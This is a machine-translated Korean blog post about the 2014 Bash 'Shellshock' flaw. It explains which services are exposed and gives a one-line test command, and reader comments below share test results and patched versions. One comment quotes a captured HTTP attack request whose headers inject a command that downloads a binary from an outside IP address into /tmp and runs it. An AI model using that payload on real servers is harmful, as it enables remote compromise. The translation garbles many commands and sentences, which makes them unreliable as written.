Bash : 새로운 취약점 감지 (및 수정)

일부 블로그에서 산불처럼 실행되고 있습니다. 보안 블로그 de 레드햇 전역 변수의 오용으로 인해 Bash에서 발견 된 취약점에 대해 설명합니다. 원래 뉴스에 따르면 :

“… 취약점은 bash 셸을 호출하기 전에 특수하게 조작 된 값을 가진 환경 변수를 생성 할 수 있다는 사실 때문입니다. 이러한 변수에는 셸이 호출되는 즉시 실행되는 코드가 포함될 수 있습니다. 이 정교한 변수의 이름은 중요하지 않으며 내용 만. 결과적으로이 취약점은 여러 상황에서 노출됩니다.예 :

  • 강제 명령 원격 사용자에게 제한된 명령 실행 기능을 제공하기 위해 sshd 구성에서 사용됩니다. 이 결함은이를 방지하고 임의의 명령 실행을 제공하는 데 사용될 수 있습니다. 일부 Git 및 Subversion 구현은 이러한 제한된 셸을 사용합니다. 사용자가 이미 콘솔에 액세스 할 수 있으므로 OpenSSH를 정기적으로 사용하는 것은 영향을받지 않습니다..
  • mod_cgi 또는 mod_cgid를 사용하는 Apache 서버는 CGI 스크립트가 bash 또는 spawn 하위 수준에서 모두 작성되는 경우 영향을받습니다. 이러한 하위 수준은 PHP에서 system / exec 셸을 사용하는 경우 C의 system / popen, Python의 os.system / os.popen에 의해 암시 적으로 사용됩니다. (CGI 모드에서 실행할 때), Perl에서 / 시스템을 엽니 다 (명령 문자열에 따라 다름).
  • mod_php로 실행되는 PHP 스크립트는 하위 레벨이 재생 되더라도 영향을받지 않습니다.
  • DHCP 클라이언트는 잠재적 인 악성 서버에서 가져온 값으로 시스템을 구성하기 위해 쉘 스크립트를 호출합니다. 이렇게하면 DHCP 클라이언트 시스템에서 임의의 명령이 일반적으로 루트로 실행될 수 있습니다.
  • SUID 권한이있는 다양한 데몬 및 프로그램은 사용자가 설정 / 영향을받은 환경 변수 값으로 셸 스크립트를 실행할 수 있으므로 임의의 명령을 실행할 수 있습니다.
  • 쉘에 연결하거나 bash를 인터프리터로 사용하는 것과 같은 쉘 스크립트를 실행하는 기타 모든 애플리케이션. 변수를 내 보내지 않는 셸 스크립트는 신뢰할 수없는 콘텐츠를 처리하고 저장하더라도이 문제에 취약하지 않습니다. 쉘 변수 (왼쪽) 및 하위 수준이 열립니다.

... "

내 bash가 영향을 받는지 확인하는 방법은 무엇입니까?

이를 감안할 때 우리가이 취약점의 영향을 받는지 알 수있는 매우 간단한 방법이 있습니다. 사실, 나는 내 Antergos에서 테스트했고 분명히 문제가 없습니다. 우리가해야 할 일은 터미널을 열고 다음을 입력하는 것입니다.

env x = '() {:;}; echo 취약한 'bash -c "echo 이것은 테스트입니다"

이런 식으로 나오면 문제가 없습니다.

env x = '() {:;}; echo 취약한 'bash -c "echo this is a test"bash : 경고 : x : 함수 정의 무시 시도 bash : error importing function definition for`x'this is a test

결과가 다른 경우 선호하는 배포판의 업데이트 채널을 사용하여 이미 패치를 적용했는지 확인해야합니다. 그래서 알다시피 😉

업데이트 됨 : Ubuntu 14:04를 사용하는 동료의 출력입니다.

env x = '() {:;}; echo 취약한 'bash -c "echo 이것은 테스트입니다"취약 함이 테스트입니다

보시다시피 지금까지 취약합니다.


66 코멘트, 당신의 것을 남겨주세요

코멘트를 남겨주세요

귀하의 이메일 주소는 공개되지 않습니다. 필수 필드가 표시되어 있습니다 *

*

*

  1. 데이터 책임자 : Miguel Ángel Gatón
  2. 데이터의 목적 : 스팸 제어, 댓글 관리.
  3. 합법성 : 귀하의 동의
  4. 데이터 전달 : 법적 의무에 의한 경우를 제외하고 데이터는 제 XNUMX 자에게 전달되지 않습니다.
  5. 데이터 저장소 : Occentus Networks (EU)에서 호스팅하는 데이터베이스
  6. 권리 : 귀하는 언제든지 귀하의 정보를 제한, 복구 및 삭제할 수 있습니다.

  1.   거슨

    14.04에서 Kubuntu 64가 있으며 다음도 얻습니다.

    env x = '() {:;}; echo 취약한 'bash -c "echo 이것은 테스트입니다"
    취약
    이 테스트입니다

    이미 업데이트했지만 정확하지 않습니다. 무엇을해야합니까?

    1.    엘라 브

      업데이트 될 때까지 기다리십시오. 예를 들어 이미 eOS가 업데이트되었습니다 .. 😀

    2.    요한 복음

      이상하게도 쿠분투 14.04도 있습니다

      $ env x = '() {:;}; echo 취약한 'bash -c "echo 이것은 테스트입니다"
      bash : 경고 : x : 함수 정의 시도 무시
      bash :`x '에 대한 함수 정의 가져 오기 오류
      이 테스트입니다

      1.    요한 복음

        오늘 다운로드 한 "bash"패키지 버전은 다음과 같습니다.
        4.3-7ubuntu1.1

        http://packages.ubuntu.com/trusty/bash

    3.    엘리오타임3000

      제 경우에는 명령을 내리면 터미널에서 다음을 제공합니다.

      >

      어쨌든, 농담은 내가 Debian Wheezy를 업데이트했고 그것이 나를 차버린 것입니다.

      1.    유키 테루

        Wheezy는 여전히 버그의 두 번째 부분에 취약합니다. 적어도 오후 (UTC -4 : 30)에는 문제가 계속 발생했습니다. /

  2.   피터 체코

    오늘 아침 업데이트를 적용한 후 Slackware, Debian, Centos가 해당 업데이트를 받았기 때문에 영향을받지 않음을 확인했습니다.

    이 시간에 우분투가 여전히 취약한 이유는 무엇입니까? 그리고 안전하다고 말해 : D.

    1.    요한 복음

      하지만 우분투 업데이트를 시도해 보셨습니까?
      오늘의 업데이트로 그들은 또한 그것을 고쳤습니다.

      1.    피터 체코

        OK

    2.    로켓

      보안 전문가들은 'Bash'취약점에 대해 경고하며 해커가 Bash의 버그를 악용하여 시스템을 완전히 제어 할 수있는 Heartbleed 버그보다 Linux 소프트웨어 사용자에게 더 큰 위협이 될 수 있다고 경고합니다.
      사이버 보안 회사 인 Rapid7의 엔지니어링 관리자 인 Tod Beardsley는이 결함이 심각도에 대해 10 점 (최대 영향을 미침을 의미 함), 익스플로잇의 복잡성에 대해 "낮음"으로 평가하여 '해커'에게 상대적으로 쉽다고 경고했습니다. 공격. 이 취약점을 사용함으로써 공격자는 잠재적으로 운영 체제를 제어하고 기밀 정보에 액세스하고 변경하는 등의 작업을 수행 할 수 있습니다.”라고 Beardsley는 말했습니다. "Bash를 사용하는 시스템을 가진 사람은 누구나 즉시 패치를 적용해야합니다."라고 그는 덧붙였습니다.
      Bach가 호스팅되는 이전 도구 (GNU)가 나타나는이 취약점 이전에 Linux 소프트웨어가 GNU를 제거하고 BSD 도구를 변경하는 것이 더 편리 할 것입니다.

      추신 : 내 표현의 자유를 검열하지 마십시오. ... 누구를 모욕하지 마십시오. ... 내가 삭제 한 이전 메시지처럼 내 메시지를 삭제하지 마십시오!.

      1.    제 릭스

        오, 과용하지 마세요. BSD를 사용하는 사람들을 혐오하고 GNU, Linux 또는 이러한 프로젝트의 모든 것을 경멸합니다.

      2.    피터 체코

        나는 당신과 함께 있고 당신은이 구멍의 심각성에 대해 절대적으로 옳습니다.

      3.    디아 제판

        그것은 검열이 아니었고 중복이었습니다 (그놈 3.14 게시물에서 동일한 의견을 작성했습니다)

      4.    직원

        «… 악용의 복잡성으로 인해 "낮음"으로 평가되었습니다. 이는 해커 공격에 상대적으로 쉬움을 의미합니다.»

        부조화가 눈에 띄나요?
        취약성을 악용하기 쉽고 동시에 사용하기가 매우 복잡하기 때문에 "낮은"수준의 위험을 어떻게 가질 수 있습니까?
        서로를 알고 몇 시간 내에 해결 된 버그이며 heartbleed처럼 악용되었다는보고가 없습니다 (물론 서로를 알 시간이 적습니다).
        실제 위험보다 타블로이드 언론에 가깝습니다.

      5.    피터 체코

        @Staff가 당신에게 중요하지 않은 것 같습니까? 이제 나에게 무엇을 말 하시겠습니까?

        GET./.HTTP/1.0
        . 사용자 에이전트 : .Thanks-Rob
        . 쿠키 : (). {. :;.};. wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        . 호스트 : (). {. :;.};. wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        . 참조 : (). {. :;.};. wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .동의하기:. * / *

        $ 파일 nginx
        nginx : ELF 32 비트 LSB 실행 가능, Intel 80386, 버전 1 (SYSV), 정적으로 연결됨, GNU / Linux 2.6.18 용, 제거됨

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $sha256sum nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        그게 뭔지 알아? 조금 위험한 것은 ...

      6.    유키 테루

        상황은 매우 심각하지만 BSD 옵션에 대해 bash 사용을 중지해야한다고 말하면 이미 그 정도입니다. 어쨌든 업데이트가 이미 존재합니다. 업데이트 만 터치하면됩니다.

        이제 PD 님, 저는 동료 @robet에 가깝다고 생각합니다. 저는 여기 관리자가 그런 댓글을 삭제하는 데 전념하지 않는다고 생각합니다. 왜냐하면 제가이 커뮤니티에 참여했기 때문에 저는 그 느낌을 가지고 있기를 바랍니다. 그대로 유지됩니다.

        인사말.

      7.    엘라 브

        두 개의 다른 게시물에 똑같은 댓글을 달았습니다. 뉴스의 "출처"를 홍보하려는 경우 미안합니다. 이곳이 아닙니다.

      8.    마리오

        Bash는 Unix (및 GNU 클론)에서 제공됩니다. OSX와 같은 BSD 기반 시스템도 영향을받으며 Genbeta에 따르면 아직 패치를 적용하지 않았습니다. 마찬가지로 Bash에 액세스하려면 로컬 또는 SSH를 통해 사용자 계정이 필요합니다.

      9.    유키 테루

        @직원:

        1.-버그의 영향을받을 수있는 서비스의 양에 따라 레벨 10 (최대 위험 수준)으로 분류됩니다. 주요 메모에서 그들은 버그가 apache, sshd, suid 권한이있는 프로그램 (xorg 등)과 같은 서비스에 영향을 미칠 수 있다고 주장하면서 그 사실을 매우 명확하게합니다.

        2.- 구현과 관련하여 Low Level of Difficulty로 분류되며, 가장 좋은 예는 @elav가 게시물에 배치 한 취약점 테스트 스크립트입니다. 보시다시피 구현하기가 매우 어렵습니다.

        정보가 중복되지 않고 (Google 번역 만 표시됨) 문제가 상당히 심각하고 말씀하신대로 이미 패치와 솔루션이 있지만 그에 대한 문제가 아니라면 더 이상 위험하지 않습니다. 그리고 아주 진짜입니다.

      10.    직원

        @petercheco / @유키테루

        오해하지 마십시오. 제 비판은 Robet이 링크하고 중복성이 아닌 불일치에 초점을 맞춘 뉴스라는 것이 분명하다고 생각합니다.

        같은 방식으로 우리는 위험과 위험을 구분해야합니다 (후자는 언급하지 않습니다). 일반적으로 동의어로 사용하지만 여기서 위험은 버그의 손상 용량이며 발생 확률에 대한 위험이 있습니다.
        특별한 경우는 어제부터 들어 왔습니다. 메일 링리스트 나 그와 비슷한 것이 아니라 데스크톱 배포판이었습니다! 나는 전화를 들고 링크와 함께 시스템 관리자에게 메시지를 보냈고 모든 것이 패치되었음을 확인한 다음 실례하지만이 소식이 나를 깨어있게하지는 않습니다.

      11.    로켓

        다른 포럼에서 그들은 Bash 취약점, "데비안과 우분투가 발표 한 솔루션"에 대해 언급했지만, 오늘 그들은 취약점이 여전히 존재한다는 것을 발견했습니다. 그래서 해결책이 불완전하다는 것을 그들이 언급 한 것입니다!

        많은 사람들이 취약성의 심각성으로부터 사람들을 막는 단순한 사실 (최대 위험 수준 10 수준)과 Bash가 호스팅되는 구식 GNU 도구 이전에 Linux 소프트웨어에 대한 가능한 솔루션을 언급한다는 단순한 사실에 대해 저를 비판했습니다. Linux 소프트웨어의 BSD 도구로 대체 될 수 있습니다. 저는 Linux도 사용하고 Linux를 좋아합니다!

        Bash는 기본적으로 BSD에 설치되지 않으며 BSD에 설치할 수있는 Linux 호환성 패키지가 하나 더 있습니다. 그리고 많은 사용자가 때때로 메시지 나 댓글을 믿지 않기 때문에 뉴스를 확인할 수 있도록 소스가 배치됩니다.

        1.    엘라 브

          robet : 그들이 이미 당신에게 반복해서 말했듯이, 당신은 이미 뉴스와 함께 당신의 코멘트를 포스트에 넣었으므로 당신이 코멘트하는 모든 포스트에 그것을 넣을 필요가 없습니다.

          Bash에 대해 Bash가 취약한 경우 사용할 수있는 다른 셸이 있기 때문입니다. 😉

      12.    마리오

        Robet, 내가 알고있는 것은 리눅스 커널과 BSD 사용자 영역을 결합하는 소프트웨어가 없다는 것입니다. 가장 가까운 것은 Gentoo와 Debian처럼 kBSD + GNU입니다. 게다가 GNU (1983)는 BSD (1977) 이후라면 "구식"이라고 할 수 없습니다. 둘 다 유닉스 루트를 공유하지만 (코드는 아님) Linus T가 아직 어렸을 때 Bash가 생성 되었다면 "리눅스 호환성"이 없을 것입니다.

  3.   Manuelperezf

    uff,이 시점에서 데비안 테스트는 "취약하다"는 것입니다.

    1.    mrcelhw

      저는 데비안 테스팅을 사용하는데이 브랜치에서도 bash 업데이트를 받았습니다.

  4.   디아 제판

    genbeta에 따르면 또 다른 취약점이 있습니다
    http://seclists.org/oss-sec/2014/q3/685

    쿼리 할 명령은
    env X = '() {(a) => \'sh -c "에코 취약"; bash -c "에코 실패 2 패치되지 않음"

    1.    엘라 브
      env X = '() {(a) => \'sh -c "에코 취약"; bash -c "echo Unpatched Failure 2"sh : X : 줄 1 : 예기치 않은 요소 근처의 구문 오류`= 'sh : X : 줄 1 :`'sh :`X '에 대한 함수 정의 가져 오기 오류 : 취약 : 명령을 찾을 수 없음 패치없이 실패 2
      
      1.    디아 제판

        같은 나.

      2.    Giskard

        여기도 마찬가지입니다. 그러나 게시물의 원래 버그는 (L) Ubuntu 14.04에서 패치되었습니다.

      3.    x11tete11x

        간단한 에코를 수행하는 대신 권한이 필요한 명령을 실행하도록 시도합니다. "권한 부족"을 던집니다.이 버그는 권한을 상승시키지 않습니까?

      4.    Xurxo

        네가 옳아!! 그들은 두 가지 취약점이었습니다 ...

        Linux Mint 17에서 지난 밤 Ubuntu 리포지토리에 두 번째 bash 업데이트 후 해당 명령을 실행할 때 셸이 다음 출력을 제공합니다.

        env X = '() {(a) => \'sh -c "에코 취약"; bash -c "echo Fail 2 unpatched"
        >

        이전 저장소를 업데이트하기 위해 Ubuntu 저장소에 배치 된 "bassh"버전은 다음과 같습니다.

        4.3-7ubuntu1.2

        Debian 파생 시스템에서는 다음 명령으로 설치된 버전을 확인할 수 있습니다.

        dpkg -s bash | grep 버전

        어쨌든 적어도 Debian, Ubuntu 및 Mint 사용자에게는 명확해야합니다. #! / bin / sh 헤더를 사용하여 스크립트를 실행하는 프로그램에 대해 너무 걱정해서는 안됩니다. 해당 배포판에서 / bin / sh는 "bash"를 호출하지 않지만 쉘 "dash"(dash는 :)에 바인딩하기 때문입니다.

        Debian Alchemist 콘솔 (대시)은 파생 된 POSIX 콘솔입니다.

        .
        bash보다 빠르게 스크립트를 실행하고 종속성이 적기 때문에
        라이브러리 (소프트웨어 오류 또는
        하드웨어), 시스템의 기본 시스템 콘솔로 사용됩니다.
        데비안.

        따라서 적어도 우분투에서는 "bash"가 사용자 로그인 (루트 사용자 용)을위한 셸로 사용됩니다. 그러나 모든 사용자는 기본적으로 사용자 및 루트 콘솔 (터미널)에 대해 다른 셸을 사용할 수 있습니다.

        다음 명령을 실행하여 쉘이 스크립트 (#! / Bin / sh)를 실행하는지 쉽게 확인할 수 있습니다.

        파일 / bin / sh
        (출력은 / bin / sh :`dash '에 대한 심볼릭 링크입니다.) 우리는 명령을 반복하는 추적을 따릅니다.

        파일 / 빈 / 대시
        (출력은 / bin / dash : ELF 64 비트 LSB 공유 객체, x86-64, 버전 1 (SYSV)이므로 실행 파일입니다.

        Linux Mint 17 배포판의 결과입니다. 다른 비 Ubuntu / Debian 기반 배포판에서는 다를 수 있습니다.

        기본 셸을 변경하는 것은 어렵지 않습니다 !! 사용자와 루트 사용자에 대해 다른 것을 사용할 수도 있습니다. 실제로 선택한 셸을 설치하고 "chsh"명령을 사용하거나 / etc / passwd 파일을 편집하여 기본값을 변경해야합니다 ( "passwd"파일을 편집 할 때 오류의 결과를 알지 못하는 사용자는 있지만, 그들이 자신에게 매우 잘 알리고 편집하기 전에 복구해야 할 경우 원본을 복사하는 것이 좋습니다).

        나는 "tcsh"가 더 편하다 (tcsh는 :)

        Berkeley csh의 개선 된 버전 인 TENEX C 콘솔

        "Csh"는 몇 년 전에 Mac OS X에서 사용한 것입니다. Apple의 운영 체제의 대부분이 FreeBSD 코드라는 점을 고려하면 의미가 있습니다. 어제 읽은 내용을 보면 사용자 터미널에 "bash"도 제공하는 것 같습니다.

        결론 :

        -패치 된 "bash"버전 "가장 많이 사용되는 배포판"이 이미 배포되었습니다.
        - "bash"버전 4.3-7ubuntu1.2 이상은 이러한 버그를 포함하지 않습니다.
        -OS * Linux에서 반드시 "bash"를 사용하지 않아도됩니다.
        -거의 * 리눅스 배포판은 #! / Bin / sh와 "bash"를 연결합니다.
        -대안이 있습니다 : ash, dash, csh, tcsh 등
        -터미널을 열 때 시스템이 호출하는 기본 쉘을 변경하는 것은 복잡하지 않습니다.
        - "bash"를 사용하는 소형 장치 (라우터 등)는 매우 크기 때문에 !!

      5.    Xurxo

        현재 "bash"4.3-7ubuntu1.3의 다른 버전을 설치하는 또 다른 업데이트가 도착했습니다.

        Linux Mint 17 및 Ubuntu 14.04.1 LTS의 경우

        1.    엘라 브

          ArchLinux는 버전 bash-4.3.026-1에 진입했습니다.

    2.    로켓

      @ Xurxo… .csh from Berkeley?,… 위에서 말한 내용을 이해하고 있습니다. Bash가 호스팅되는 이전 GNU 도구보다 BSD "csh"를 사용하는 것이 좋습니다. 이 도구는 Linux 소프트웨어에 가장 적합합니다.

  5.   명명되지 않은

    나는 이것이 버그라고 생각한다

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    진실?

  6.   곤잘로

    그리고 해결책은 무엇일까요?

    1.    엘라 브

      배포판에서 패키지를 업데이트 할 때까지 기다리세요 😉

  7.   디아 제판

    버그는 쉘 쇼크로 침례를 받았습니다.
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   파블로 이반 코레아

    취약
    이 테스트입니다

    Ubuntu Studio 14.04에 대한 패치는 아직 없습니다.

    1.    도깨비불

      Ubuntu Studio 14.04.1에서 복구 됨
      wisp @ ubuntustudio : ~ $ env x = '() {:;}; echo 취약한 'bash -c "echo 이것은 테스트입니다"
      bash : 경고 : x : 함수 정의 시도 무시
      bash :`x '에 대한 함수 정의 가져 오기 오류
      이 테스트입니다

  9.   승용차

    실제로 그것은 사소한 취약점입니다. 그것이 당신에게 영향을 미친다면, 그것은 당신이 이전에 뭔가 잘못하고 있었다는 것입니다.

    루트 권한으로 실행되는 bash 스크립트는 사용자에게 노출되지 않아야하기 때문입니다. 그리고 권한없이 달리면 그러한 취약성은 없습니다. 사실, 그것은 어리 석습니다. 많은 겁나게합니다.

    1.    제 릭스

      저도 마찬가지라고 생각합니다.

    2.    직원

      정확하게, 더 많은 신문을 판매하거나 더 많은 방문을 얻으려면 이러한 버그가 좋습니다.
      그러나 그들은 항상 이러한 종류의 스크립트로 컴퓨터를 손상 시키려면 먼저 bash에 액세스 한 다음 루트로 있어야한다는 것을 언급하는 것을 잊어 버립니다.

      1.    Daryo

        cgi와 함께 아파치를 사용하는 경우 http 헤더를 쿠키로 입력하거나 실행하려는 기능을 참조하십시오. 벌레를 퍼뜨리는데도 사용되었습니다.

    3.    Daryo

      그리고 누군가가 wget mishell.php를 사용하여 서버에 쉘을 넣는 경우,이 경우 심각하지 않습니까?

    4.    엘리오타임3000

      당신과 동의. 나는 그것이 Heartbleed에있는 것과 같은 거대한 버그라고 생각했지만 (심지어 NSA조차도 이환율을 높이기 위해 빌려 주었다) 결국 그것은 사소한 버그였습니다.

      Flash의 미친 소비와 Pepper Flash Player의 성능 저하, 이미 수정 된 버그와 같은 다른 심각한 버그가 있습니다. Chrome 및 Firefox의 webRTC 버그.

  10.   바인더 맨

    Linux Mint 16을 사용하는 사람들을위한 배열이 있는지 알고 있습니까?

  11.   오스카

    데비안 테스트에서는 이미 수정되었습니다.

  12.   유유

    내 5 배포판에서는 해결되었지만 내 OS X에서는 모르겠습니다.

    제 댓글을 검열하지 마십시오. OS X라고했습니다.이 사이트에서 OS X를 말할 수 있는지 모르겠습니다.

    1.    Tannhausser

      @yoyo는 패치에 대한 세부 사항을 아직 작업 중이라고 너무 많이 놀라지 마십시오. 이것을 시도한 다음 XD를 걸어보세요.

      env x = '() {:;}; echo 취약한 'bash -c "echo 나는 iphone 6 쓰레기보다 더 취약합니다."

      그들이 OS X 이전에 100 % 풀었다면 나는 아무 것도 내기

    2.    엘리오타임3000

      음, Ars Technica에서도 OSX의 Bash에 관련성을 부여합니다.

    3.    엘라 브

      @Yoyo는 스팸을 위해 OS X에 다음 코멘트 .. lla tu save .. 😛

  13.   Tannhausser

    @yoyo 따옴표를 수정하기 위해 ...하지만 나머지는 알고 있습니다 😉

    1.    엘리오타임3000

      그들이 OSX를 애용하는 것처럼 (OSX는 여전히 Bash를 사용하기 때문에 : v).

      어쨌든, 데비안 제시를별로 엉망으로 만들 필요는 없습니다.

  14.   엘후이2

    시스템이 Cent OS에서 취약한 경우 :
    yum clean all && yum 업데이트 bash

    bash 버전을 보려면 :
    rpm -qa | 그렙 배쉬

    버전이 bash-4.1.2-15.el6_5.1 이전이면 시스템이 취약 할 수 있습니다!

    인사말.

  15.   Manuelperezf

    두 번째 취약점은 아직 해결되지 않았습니다.

    env amvariable2 = '() {(a) => \'sh -c "echo amVulnerable"; bash -c "에코 실패 2 패치되지 않음"

  16.   예수 페랄 레스

    업데이트 중 ...

  17.   스위처

    Gentoo에서는 그 반대가 발생합니다. 첫 번째 실패에만 취약하지만 두 번째 실패에서는 다음과 같은 결과가 발생합니다.
    [code] sh : X : 줄 1 : 예기치 않은 요소`= '근처의 구문 오류
    sh : X : 줄 1 : ''
    sh :`X '에 대한 함수 정의 가져 오기 오류
    sh : 취약 함 : 명령을 찾을 수 없음
    버그 2가 패치되지 않음
    [/ 코드]
    버그가 수정 된 Bash의 안정적인 버전이 이미 있는지는 모르겠지만, 다음 번에 emerge –sync && emerge –update –deep –with-bdeps = 및 – newuse @world (전체 시스템을 업데이트하는 방법입니다).

    1.    유키 테루

      버전 4.2_p50의 Gentoo가 있으며 지금까지 모든 테스트를 통과했습니다. –sync를 이머 지 한 다음 이머 지 -av1 app-shells / bash를 시도한 다음 bash –version 명령을 사용하여 버전 4.2_p50이 있는지 확인합니다.

  18.   하기까지

    이거 해봤 어?

    새로운 패키지와 함께 Red Hat이 제공하는 새로운 테스트

    cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \'bash -c "에코 날짜"; 고양이 / tmp / 에코

    우리 시스템이 취약하지 않고 올바르게 패치 되었다면 다음과 같은 것을 제공해야합니다.
    1 날짜
    2 cat : / tmp / echo : 파일 또는 디렉토리가 존재하지 않습니다.

  19.   유키 테루

    이 방법을 시도하십시오.

    env X = '() {(a) => \'sh -c "에코 취약"; bash -c "에코 실패 2 패치 됨"

    나는 얻다

    취약
    버그 2가 패치되었습니다.

    1.    유키 테루

      잊어 버리세요, 라인의 형식이 잘못되었습니다.

  20.   오스카 메자

    훌륭합니다. Slackware에서 이미 업데이트했습니다. 감사합니다.

  21.   로스브로크

    안녕하세요, 질문이 생겼습니다. "SUSE Linux Enterprise Server 10"64 비트를 사용하는 여러 서버가 있습니다.
    내가 취약한 명령을 실행하면 iPhone 6 xD 쓰레기보다 훨씬 취약합니다.
    SUSE에서 패키지를 업데이트 / 설치하는 것이 잘못된 것이 아니라면«zypper»명령으로 수행됩니다.

    일부 서버에서는 다음과 같이 알려줍니다.

    BIAL : ~ # zypper up
    -bash : zypper : 명령을 찾을 수 없음
    BIAL : ~ #

    그리고 다른 것들은 :

    SMB : ~ # zypper up
    시스템 소스 복원 중…
    SUSE Linux Enterprise Server 10 SP2-20100319-161944의 메타 데이터 구문 분석 중…
    RPM 데이터베이스 구문 분석 중 ...
    슬립폼 공법 선택시 고려사항
    할 것이 없다.

    내가 뭘?
    어떤 사람들은 취약성이 그들이 그린 것보다 적다고 말하지만 나는 그것을 가지고 있으며 작든 크든 위험에 노출되고 싶지 않습니다.

    인사말.

  22.   샌더스 구티에레즈

    안녕하세요, 기사에서 제공 한 코드를 붙여 넣어 보았습니다.
    샌더스 @ pc-sanders : ~ $ env x = '() {:;}; echo 취약한 'bash -c "echo 이것은 테스트입니다"
    이 테스트입니다
    샌더스 @ pc-sanders : ~ $
    배포판을 패치하는 방법을 설명해 주시겠습니까? 매일 업데이트하고 프롬프트 출력에 변경 사항이 표시되지 않습니다.

    대단히 감사합니다!